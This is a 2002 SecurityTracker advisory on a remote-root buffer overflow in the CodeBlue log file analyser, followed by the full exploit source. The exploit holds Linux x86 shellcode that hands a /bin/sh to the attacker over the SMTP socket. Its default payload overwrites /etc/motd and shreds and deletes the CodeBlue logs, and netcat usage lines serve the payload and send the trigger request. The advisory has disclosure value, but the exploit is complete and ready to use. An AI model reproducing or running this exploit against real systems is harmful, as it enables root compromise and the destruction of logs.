SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   CodeBlue Vendors:   Apollyon
CodeBlue Log File Analysis Software Has Buffer Overflow That Allows Remote Users to Obtain Root Privileges
SecurityTracker Alert ID:  1003577
SecurityTracker URL:  http://securitytracker.com/id/1003577
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 17 2002
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): 4
Description:   A vulnerability was reported in the CodeBlue log file analysis program. A remote user can obtain root access on the system running CodeBlue.

CodeBlue is apparently designed to review Apache web server log files to look for entries made by various worms (e.g., CodeRed, NIMDA) and, if any are found, to e-mail the affected site. Apparently, CodeBlue also processes SMTP messages returned by the affected site. It is reported that CodeBlue contains a buffer overflow in its processing of SMTP responses.

A remote user can generate a NIMDA-like entry with the following type of request made to port 80 of the target host:

GET /default.ida?NNNNNN HTTP/1.0\n\n

Then, the remote user can wait until CodeBlue runs on the target host and then send a specially crafted SMTP message back to the server running CodeBlue. This specially crafted message may trigger a buffer overflow in CodeBlue, resulting in arbitrary code execution with root privileges on the system running CodeBlue.

Impact:   A remote user can cause arbitrary code to be executed with root privileges on the host running CodeBlue.
Solution:   No solution was available at the time of this entry.
Vendor URL:  freshmeat.net/projects/codeblue/ (Links to External Site)
Cause:   Boundary error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Additional Exploit Code is Released) Re: CodeBlue Log File Analysis Software Has Buffer Overflow That Allows Remote Users to Obtain Root Privileges
Additional exploit code is available in the Source Message.



 Source Message Contents

Subject:  codeblue remote root


/* 
 * Demonstration linux-x86 remote root against codeblue v1.1 (from file header)
 * Otherwise it's known as CodeBlue v4
 *
 * This is a rather trivial to exploit...
 * 
 * From get_smtp_reply()
 *
 * "We'll loop infinately, receiving
 * 1 byte at a time until we receive a carriage return
 * or line-feed character, signifying the end of the output"
 *
 * The stack looks like
 *
 *   int get_smtp_reply(int sd)
 *   {
 *       char response[1024];
 *       char reply_message[1024];  
 *   ...
 * I probably don't have to mention it, but it reads the response into response.
 * ...
 *
 * Also, since this is meant to increase security a little, why doesn't it
 * filter non-alphanumeric chars? Also, since it is playing with untrusted
 * data, why doesn't it drop uids, instead of insisting as running as root?
 *
 *    if ((userid = getuid()) != 0) {
 *       fprintf(stderr, "uid %d is invalid!\n", userid);
 *       fprintf(stderr, "This program MUST be run as root\n");
 *       exit(1);
 *    }
 *
 * Usage: gcc exp.c -o exp; ./exp | nc -l -p 25
 * Now you could do (one another terminal)
 * printf "GET /default.ida?NNNNNN HTTP/1.0\n\n" | nc remotehost 80
 * and wait until codeblue runs. 
 *
 * Granted, nc makes it remote, but why reinvent the wheel? 
 *
 * Oh, and by the way, you'll most likely have to change the offset down there.
 * Lots of improvements could (well, have) be done, such as a select(), read(),
 * write(), so you can get a remote terminal... at the moment, all it'll do
 * is make the id command display. Brute force is interesting, because you
 * have to wait until it's run. I suspect, though I haven't tried, you could
 * almost double the nop size by playing around with reply_message.
 *
 * If you had a sense of humour, you probably could turn this into a worm. This
 * is one of the reason I don't really like automated response/attack software.
 * Or you could just trojan/modify your existing smtp do to this whenever it
 * recieves a HELO localhost...
 *
 * The interesting part of this is the bug in codeblue helped me win
 * a wargame. We where given root an a box in a lan, and got to penertrate 
 * several others. Since the person running it was sick of being scanned by 
 * the various worms, he was running this....
 *
 * Now for the paranoia part, how many of those scans have you recieved where
 * to check if you where running CodeBlue?
 *
 * laters,
 * -- Andrew Griffiths
 */



#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

/* The shellcode beats doing a bindshell/connect code, since codeblue already is
 * talking to our (supposed) smtp server, so all we have to do is redirect
 * stdin/out/err to fd 5. (Assuming fd 5 is the smtp connection. It was on
 * mine.)
 */

unsigned char sc[] =
/* dupsh basically, dup2(5, (0,1,2)) */
"\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x05"
"\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
/* Standard aleph1 shellcode */
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c"
"\x89\x76\x08\xb0\x0b\x87\xf3\x8d\x4b\x08"
"\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80"
"\xe8\xde\xff\xff\xff/bin/sh";


int main()
{
	unsigned char buf[3000];
	
	memset(buf, 0, 3000);

	memset(buf, 0x90, 967);
	strncpy(buf+967, sc, strlen(sc));
	fprintf(stderr, "buf: %s\n", buf);
	fprintf(stderr, "strlen(buf): %d\n", strlen(buf));
	buf[1036] = 0xd0;
	buf[1037] = 0xdf;
	buf[1038] = 0xff;
	buf[1039] = 0xbf;
#ifdef ICANMODIFYCCODEORMODIFYCOMPILETIMEFLAGS
	strcpy(buf + 1040, " id");
#else
	strcpy(buf + 1040, " echo warning codeblue has a remote root hole in it >/etc/motd; shred -z codeblue*log* 2>/dev/null; rm -f codeblue*log*
 2>/dev/null; echo you sux. RTFC...");
#endif
	printf("%s", buf);
}


--
www.tasmail.com


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC